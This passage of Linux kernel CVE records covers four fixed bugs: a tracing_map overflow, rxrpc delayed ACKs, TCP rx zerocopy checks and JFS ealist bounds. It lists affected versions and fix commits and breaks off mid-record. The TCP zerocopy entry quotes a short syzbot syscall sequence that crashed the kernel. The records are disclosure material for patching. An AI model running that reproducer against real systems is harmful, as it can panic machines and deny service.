          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntracing: Fix overflow in get_free_elt()\n\n\"tracing_map-\u003enext_elt\" in get_free_elt() is at risk of overflowing.\n\nOnce it overflows, new elements can still be inserted into the tracing_map\neven though the maximum number of elements (`max_elts`) has been reached.\nContinuing to insert elements after the overflow could result in the\ntracing_map containing \"tracing_map-\u003emax_size\" elements, leaving no empty\nentries.\nIf any attempt is made to insert an element into a full tracing_map using\n`__tracing_map_insert()`, it will cause an infinite loop with preemption\ndisabled, leading to a CPU hang problem.\n\nFix this by preventing any further increments to \"tracing_map-\u003enext_elt\"\nonce it reaches \"tracing_map-\u003emax_elt\"."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:28:39.283Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/302ceb625d7b990db205a15e371f9a71238de91c"
        },
        {
          "url": "https://git.kernel.org/stable/c/d3e4dbc2858fe85d1dbd2e72a9fc5dea988b5c18"
        },
        {
          "url": "https://git.kernel.org/stable/c/eb223bf01e688dfe37e813c8988ee11c8c9f8d0a"
        },
        {
          "url": "https://git.kernel.org/stable/c/cd10d186a5409a1fe6e976df82858e9773a698da"
        },
        {
          "url": "https://git.kernel.org/stable/c/788ea62499b3c18541fd6d621964d8fafbc4aec5"
        },
        {
          "url": "https://git.kernel.org/stable/c/a172c7b22bc2feaf489cfc6d6865f7237134fdf8"
        },
        {
          "url": "https://git.kernel.org/stable/c/236bb4690773ab6869b40bedc7bc8d889e36f9d6"
        },
        {
          "url": "https://git.kernel.org/stable/c/bcf86c01ca4676316557dd482c8416ece8c2e143"
        }
      ],
      "title": "tracing: Fix overflow in get_free_elt()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43890",
    "datePublished": "2024-08-26T10:10:43.547Z",
    "dateReserved": "2024-08-17T09:11:59.289Z",
    "dateUpdated": "2025-11-03T22:06:48.215Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26677 (GCVE-0-2024-26677)

Vulnerability from cvelistv5 – Published: 2024-04-02 07:01 – Updated: 2025-05-04 08:53

Title

rxrpc: Fix delayed ACKs to not set the reference serial number

Summary

In the Linux kernel, the following vulnerability has been resolved: rxrpc: Fix delayed ACKs to not set the reference serial number Fix the construction of delayed ACKs to not set the reference serial number as they can't be used as an RTT reference.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/200cb50b9e1544344…
	https://git.kernel.org/stable/c/63719f490e6a89896…
	https://git.kernel.org/stable/c/e7870cf13d20f56bf…

Impacted products

Vendor

Product

Version

Linux

Affected: 17926a79320afa9b95df6b977b40cca6d8713cea , < 200cb50b9e154434470c8969d32474d38475acc2 (git)
Affected: 17926a79320afa9b95df6b977b40cca6d8713cea , < 63719f490e6a89896e9a463d2b45e8203eab23ae (git)
Affected: 17926a79320afa9b95df6b977b40cca6d8713cea , < e7870cf13d20f56bfc19f9c3e89707c69cf104ef (git)

Linux

Affected: 2.6.22
Unaffected: 0 , < 2.6.22 (semver)
Unaffected: 6.6.17 , ≤ 6.6.* (semver)
Unaffected: 6.7.5 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26677",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-04-02T14:58:11.213319Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:09.299Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:12.563Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/200cb50b9e154434470c8969d32474d38475acc2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/63719f490e6a89896e9a463d2b45e8203eab23ae"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e7870cf13d20f56bfc19f9c3e89707c69cf104ef"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/rxrpc/ar-internal.h",
            "net/rxrpc/call_event.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "200cb50b9e154434470c8969d32474d38475acc2",
              "status": "affected",
              "version": "17926a79320afa9b95df6b977b40cca6d8713cea",
              "versionType": "git"
            },
            {
              "lessThan": "63719f490e6a89896e9a463d2b45e8203eab23ae",
              "status": "affected",
              "version": "17926a79320afa9b95df6b977b40cca6d8713cea",
              "versionType": "git"
            },
            {
              "lessThan": "e7870cf13d20f56bfc19f9c3e89707c69cf104ef",
              "status": "affected",
              "version": "17926a79320afa9b95df6b977b40cca6d8713cea",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/rxrpc/ar-internal.h",
            "net/rxrpc/call_event.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.22"
            },
            {
              "lessThan": "2.6.22",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.17",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.17",
                  "versionStartIncluding": "2.6.22",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.5",
                  "versionStartIncluding": "2.6.22",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "2.6.22",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nrxrpc: Fix delayed ACKs to not set the reference serial number\n\nFix the construction of delayed ACKs to not set the reference serial number\nas they can\u0027t be used as an RTT reference."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:53:44.855Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/200cb50b9e154434470c8969d32474d38475acc2"
        },
        {
          "url": "https://git.kernel.org/stable/c/63719f490e6a89896e9a463d2b45e8203eab23ae"
        },
        {
          "url": "https://git.kernel.org/stable/c/e7870cf13d20f56bfc19f9c3e89707c69cf104ef"
        }
      ],
      "title": "rxrpc: Fix delayed ACKs to not set the reference serial number",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26677",
    "datePublished": "2024-04-02T07:01:41.569Z",
    "dateReserved": "2024-02-19T14:20:24.151Z",
    "dateUpdated": "2025-05-04T08:53:44.855Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26640 (GCVE-0-2024-26640)

Vulnerability from cvelistv5 – Published: 2024-03-18 10:19 – Updated: 2025-05-04 08:52

Title

tcp: add sanity checks to rx zerocopy

Summary

In the Linux kernel, the following vulnerability has been resolved: tcp: add sanity checks to rx zerocopy TCP rx zerocopy intent is to map pages initially allocated from NIC drivers, not pages owned by a fs. This patch adds to can_map_frag() these additional checks: - Page must not be a compound one. - page->mapping must be NULL. This fixes the panic reported by ZhangPeng. syzbot was able to loopback packets built with sendfile(), mapping pages owned by an ext4 file to TCP rx zerocopy. r3 = socket$inet_tcp(0x2, 0x1, 0x0) mmap(&(0x7f0000ff9000/0x4000)=nil, 0x4000, 0x0, 0x12, r3, 0x0) r4 = socket$inet_tcp(0x2, 0x1, 0x0) bind$inet(r4, &(0x7f0000000000)={0x2, 0x4e24, @multicast1}, 0x10) connect$inet(r4, &(0x7f00000006c0)={0x2, 0x4e24, @empty}, 0x10) r5 = openat$dir(0xffffffffffffff9c, &(0x7f00000000c0)='./file0\x00', 0x181e42, 0x0) fallocate(r5, 0x0, 0x0, 0x85b8) sendfile(r4, r5, 0x0, 0x8ba0) getsockopt$inet_tcp_TCP_ZEROCOPY_RECEIVE(r4, 0x6, 0x23, &(0x7f00000001c0)={&(0x7f0000ffb000/0x3000)=nil, 0x3000, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0}, &(0x7f0000000440)=0x40) r6 = openat$dir(0xffffffffffffff9c, &(0x7f00000000c0)='./file0\x00', 0x181e42, 0x0)

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/f48bf9a83b1666d93…
	https://git.kernel.org/stable/c/718f446e60316bf60…
	https://git.kernel.org/stable/c/b383d4ea272fe5795…
	https://git.kernel.org/stable/c/d15cc0f66884ef2be…
	https://git.kernel.org/stable/c/1b8adcc0e2c584fec…
	https://git.kernel.org/stable/c/577e4432f3ac81004…

Impacted products

Vendor

Product

Version

Linux

Affected: 93ab6cc69162775201587cc9da00d5016dc890e2 , < f48bf9a83b1666d934247cb58a9887d7b3127b6f (git)
Affected: 93ab6cc69162775201587cc9da00d5016dc890e2 , < 718f446e60316bf606946f7f42367d691d21541e (git)
Affected: 93ab6cc69162775201587cc9da00d5016dc890e2 , < b383d4ea272fe5795877506dcce5aad1f6330e5e (git)
Affected: 93ab6cc69162775201587cc9da00d5016dc890e2 , < d15cc0f66884ef2bed28c7ccbb11c102aa3a0760 (git)
Affected: 93ab6cc69162775201587cc9da00d5016dc890e2 , < 1b8adcc0e2c584fec778add7777fe28e20781e60 (git)
Affected: 93ab6cc69162775201587cc9da00d5016dc890e2 , < 577e4432f3ac810049cb7e6b71f4d96ec7c6e894 (git)

Linux

Affected: 4.18
Unaffected: 0 , < 4.18 (semver)
Unaffected: 5.10.210 , ≤ 5.10.* (semver)
Unaffected: 5.15.149 , ≤ 5.15.* (semver)
Unaffected: 6.1.77 , ≤ 6.1.* (semver)
Unaffected: 6.6.16 , ≤ 6.6.* (semver)
Unaffected: 6.7.4 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26640",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-03-18T14:20:07.780920Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:48:57.803Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:07:19.826Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "f48bf9a83b1666d934247cb58a9887d7b3127b6f",
              "status": "affected",
              "version": "93ab6cc69162775201587cc9da00d5016dc890e2",
              "versionType": "git"
            },
            {
              "lessThan": "718f446e60316bf606946f7f42367d691d21541e",
              "status": "affected",
              "version": "93ab6cc69162775201587cc9da00d5016dc890e2",
              "versionType": "git"
            },
            {
              "lessThan": "b383d4ea272fe5795877506dcce5aad1f6330e5e",
              "status": "affected",
              "version": "93ab6cc69162775201587cc9da00d5016dc890e2",
              "versionType": "git"
            },
            {
              "lessThan": "d15cc0f66884ef2bed28c7ccbb11c102aa3a0760",
              "status": "affected",
              "version": "93ab6cc69162775201587cc9da00d5016dc890e2",
              "versionType": "git"
            },
            {
              "lessThan": "1b8adcc0e2c584fec778add7777fe28e20781e60",
              "status": "affected",
              "version": "93ab6cc69162775201587cc9da00d5016dc890e2",
              "versionType": "git"
            },
            {
              "lessThan": "577e4432f3ac810049cb7e6b71f4d96ec7c6e894",
              "status": "affected",
              "version": "93ab6cc69162775201587cc9da00d5016dc890e2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv4/tcp.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.18"
            },
            {
              "lessThan": "4.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.210",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.149",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.77",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.16",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.210",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.149",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.77",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.16",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.4",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: add sanity checks to rx zerocopy\n\nTCP rx zerocopy intent is to map pages initially allocated\nfrom NIC drivers, not pages owned by a fs.\n\nThis patch adds to can_map_frag() these additional checks:\n\n- Page must not be a compound one.\n- page-\u003emapping must be NULL.\n\nThis fixes the panic reported by ZhangPeng.\n\nsyzbot was able to loopback packets built with sendfile(),\nmapping pages owned by an ext4 file to TCP rx zerocopy.\n\nr3 = socket$inet_tcp(0x2, 0x1, 0x0)\nmmap(\u0026(0x7f0000ff9000/0x4000)=nil, 0x4000, 0x0, 0x12, r3, 0x0)\nr4 = socket$inet_tcp(0x2, 0x1, 0x0)\nbind$inet(r4, \u0026(0x7f0000000000)={0x2, 0x4e24, @multicast1}, 0x10)\nconnect$inet(r4, \u0026(0x7f00000006c0)={0x2, 0x4e24, @empty}, 0x10)\nr5 = openat$dir(0xffffffffffffff9c, \u0026(0x7f00000000c0)=\u0027./file0\\x00\u0027,\n    0x181e42, 0x0)\nfallocate(r5, 0x0, 0x0, 0x85b8)\nsendfile(r4, r5, 0x0, 0x8ba0)\ngetsockopt$inet_tcp_TCP_ZEROCOPY_RECEIVE(r4, 0x6, 0x23,\n    \u0026(0x7f00000001c0)={\u0026(0x7f0000ffb000/0x3000)=nil, 0x3000, 0x0, 0x0, 0x0,\n    0x0, 0x0, 0x0, 0x0}, \u0026(0x7f0000000440)=0x40)\nr6 = openat$dir(0xffffffffffffff9c, \u0026(0x7f00000000c0)=\u0027./file0\\x00\u0027,\n    0x181e42, 0x0)"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:52:52.723Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f"
        },
        {
          "url": "https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e"
        },
        {
          "url": "https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e"
        },
        {
          "url": "https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760"
        },
        {
          "url": "https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60"
        },
        {
          "url": "https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894"
        }
      ],
      "title": "tcp: add sanity checks to rx zerocopy",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26640",
    "datePublished": "2024-03-18T10:19:07.025Z",
    "dateReserved": "2024-02-19T14:20:24.137Z",
    "dateUpdated": "2025-05-04T08:52:52.723Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-41017 (GCVE-0-2024-41017)

Vulnerability from cvelistv5 – Published: 2024-07-29 06:37 – Updated: 2026-01-05 10:37

Title

jfs: don't walk off the end of ealist

Summary

In the Linux kernel, the following vulnerability has been resolved: jfs: don't walk off the end of ealist Add a check before visiting the members of ea to make sure each ea stays within the ealist.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/7f91bd0f2941fa364…
	https://git.kernel.org/stable/c/fc16776a82e8df97b…
	https://git.kernel.org/stable/c/6386f1b6a10e5d1dd…
	https://git.kernel.org/stable/c/7e21574195a45fc19…
	https://git.kernel.org/stable/c/4e034f7e563ab723b…
	https://git.kernel.org/stable/c/17440dbc66ab98b41…
	https://git.kernel.org/stable/c/f4435f476b9bf059c…
	https://git.kernel.org/stable/c/dbde7bc91093fa9c2…
	https://git.kernel.org/stable/c/d0fa70aca54c86432…

Impacted products

Vendor

Product

Version

Linux

Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 7f91bd0f2941fa36449ce1a15faaa64f840d9746 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < fc16776a82e8df97b6c4f9a10ba95aa44cef7ba5 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 6386f1b6a10e5d1ddd03db4ff6dfc55d488852ce (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 7e21574195a45fc193555fa40e99fed16565ff7e (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 4e034f7e563ab723b93a59980e4a1bb33198ece8 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < 17440dbc66ab98b410514b04987f61deedb86751 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < f4435f476b9bf059cd9e26a69f5b29c768d00375 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < dbde7bc91093fa9c2410e418b236b70fde044b73 (git)
Affected: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 , < d0fa70aca54c8643248e89061da23752506ec0d4 (git)

Linux

Affected: 2.6.12
Unaffected: 0 , < 2.6.12 (semver)
Unaffected: 4.19.319 , ≤ 4.19.* (semver)
Unaffected: 5.4.281 , ≤ 5.4.* (semver)
Unaffected: 5.10.223 , ≤ 5.10.* (semver)
Unaffected: 5.15.164 , ≤ 5.15.* (semver)
Unaffected: 6.1.102 , ≤ 6.1.* (semver)
Unaffected: 6.6.43 , ≤ 6.6.* (semver)
Unaffected: 6.9.12 , ≤ 6.9.* (semver)
Unaffected: 6.10.2 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:59:20.503Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7f91bd0f2941fa36449ce1a15faaa64f840d9746"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/fc16776a82e8df97b6c4f9a10ba95aa44cef7ba5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6386f1b6a10e5d1ddd03db4ff6dfc55d488852ce"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7e21574195a45fc193555fa40e99fed16565ff7e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4e034f7e563ab723b93a59980e4a1bb33198ece8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/17440dbc66ab98b410514b04987f61deedb86751"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/f4435f476b9bf059cd9e26a69f5b29c768d00375"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/dbde7bc91093fa9c2410e418b236b70fde044b73"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d0fa70aca54c8643248e89061da23752506ec0d4"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-41017",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T16:24:38.749773Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:05.610Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/jfs/xattr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "7f91bd0f2941fa36449ce1a15faaa64f840d9746",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "fc16776a82e8df97b6c4f9a10ba95aa44cef7ba5",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "6386f1b6a10e5d1ddd03db4ff6dfc55d488852ce",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "7e21574195a45fc193555fa40e99fed16565ff7e",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "4e034f7e563ab723b93a59980e4a1bb33198ece8",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "17440dbc66ab98b410514b04987f61deedb86751",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "f4435f476b9bf059cd9e26a69f5b29c768d00375",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "dbde7bc91093fa9c2410e418b236b70fde044b73",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            },
            {
              "lessThan": "d0fa70aca54c8643248e89061da23752506ec0d4",
              "status": "affected",
              "version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/jfs/xattr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "2.6.12"
            },
            {
              "lessThan": "2.6.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.319",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.281",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.223",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.164",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.102",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.43",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.319",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.281",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.223",
